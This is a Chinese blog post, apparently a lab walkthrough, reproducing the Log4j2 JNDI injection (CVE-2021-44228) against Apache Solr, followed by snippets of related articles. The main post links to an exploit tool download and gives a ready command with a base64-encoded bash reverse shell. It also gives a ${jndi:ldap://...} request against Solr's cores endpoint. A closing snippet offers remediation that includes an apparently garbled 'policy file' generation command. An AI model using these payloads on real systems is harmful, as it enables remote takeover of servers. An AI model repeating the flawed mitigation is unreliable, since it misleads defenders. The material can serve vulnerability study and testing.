Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

最新推荐文章于 2024-08-07 19:36:00 发布
最新推荐文章于 2024-08-07 19:36:00 发布
阅读量305 收藏 2
点赞数 4
分类专栏: apache漏洞 文章标签: apache log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53639243/article/details/136375291
版权

Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。

2021 年 12 月,在 Apache Log4j2 中发现了一个 0-day 漏洞。Log4j 的 JNDI 支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。

浏览以查看 Apache Solr 的管理门户:http://192.168.92.130:8983/solr/#/


进入后去寻找注入点可参考apache log4j 2(CVE-2021-44228)漏洞复现_cve-2021-44228 漏洞复现-CSDN博客,这里不再多说。

反弹shell
工具:https://pan.baidu.com/s/1ijXAfPCFCPbU7FveCpNnRQ?pwd=v21e
提取码:v21e

启用工具构建payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEzNS84MDAwIDA+JjE=}|{base64,-d}|{bash,-i}” -A “192.168.92.135”

 

执行之后会看到熟悉的rmi和idap,利用工具生成了恶意的命令和url

http://192.168.92.130:8983:/solr/admin/cores?action=${jndi:ldap://192.168.92.135:1389/hxjutt}

发现成功重定向恶意类地址 :

终端监听端口:8000

 

青梅fox
关注
专栏目录
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2250
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228
qq_51331767的博客
04-02 627
在其2.0到2.14.1版本中存在一处JNDI注入漏洞log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP,端口是你等会nc监听的端口。JNDI注入反弹shell。
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 962
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
CVE-2021-44228(log4shell-Quick Guide)
Websec
12-14 888
log4shell - Quick Guide 0x00 Introduction CVE-2021-44228(a.k.a. log4shell) is a Remote Code Execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. This vulnerability allows an attacke.
log4j2: CVE-2021-44228[RCE]
最新发布
h1008685的博客
08-07 506
漏洞概述CVE-2021-44228Apache Log4j2漏洞,被称为"Log4Shell"。攻击者将恶意代码与服务器进行交互,使服务器日志组件将其记录并执行,从而造就RCE远程代码执行漏洞漏洞原理:Log4j2是一个日志记录工具,允许通过配置文件来定义日志的格式。日志格式中可以使用变量,这些变量在日志记录时会被替换为实际的值。:Log4j2支持使用${}来引用变量。例如,。:Log4j2还支持JNDI查找,允许通过的形式引用远程资源。:在Log4j2的某些版本中,如果日志配置不当,
Log4j2远程命令执行(CVE-2021-44228
qq_40646572的博客
05-12 1450
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
vCenter修复Apache log4j2漏洞CVE-2021-44228, CVE-2021-45046)
qq_27248929的博客
12-21 4658
2021年12月Apache log4j远程执行漏洞影响到的VMware产品列表:VMSA-2021-0028.4 (vmware.com)。 本次我们所涉及到的产品及版本是vSphere6.7下的vCenter Server Application6.7.x,以下是加固的配置步骤: 1)首先打开vCenter的shell连接,需从控制台进入vCenter虚机进行配置操作,具体为进入排错模式,Enable shell和SSH选项; 2)打开xshell 通过SSH连接vCenter进行命令行.
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6122
log4j 漏洞CVE-2021-44228 漏洞复现
CVE-2021-44228 Log4j2 远程代码执行漏洞
震山的博客
08-23 778
简单分析,扯不上深度,还望大佬指正
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2402
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
Apache Log4j代码执行漏洞(CVE-2021-44228)
weixin_45808483的博客
12-14 8037
前言: 12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。 Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。 Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2352
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
Log4j2漏洞复现(CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Log4j2 远程代码执行漏洞CVE-2021-44228
qq_68163788的博客
06-18 1419
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2694
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5334
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
[Log4j]CVE-2021-44228 CTFshow
krysyal的博客
03-31 3628
Log4j复现 CTFshow 复现参考文档1 复现参考文档2 环境 http://dcc43afd-8e07-4d9e-8bd2-b0a1c320a5b7.challenge.ctf.show/ 2.0 <= Apache log4j2 <= 2.14.1 简单来说,用户输入会记录在log4j中,而log4j自带lookup功能,格式为${parser:xxx}。如果用户输入lookup会被log4j解析。 jndi是parser的一种,是一种标准的Java命名系统接口,可以连接远程服务,格式
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1850
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
log4j2 远程代码执行漏洞复现(CVE-2021-44228
Welcome To Myon'Blog !
03-08 1万+
log4jApache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值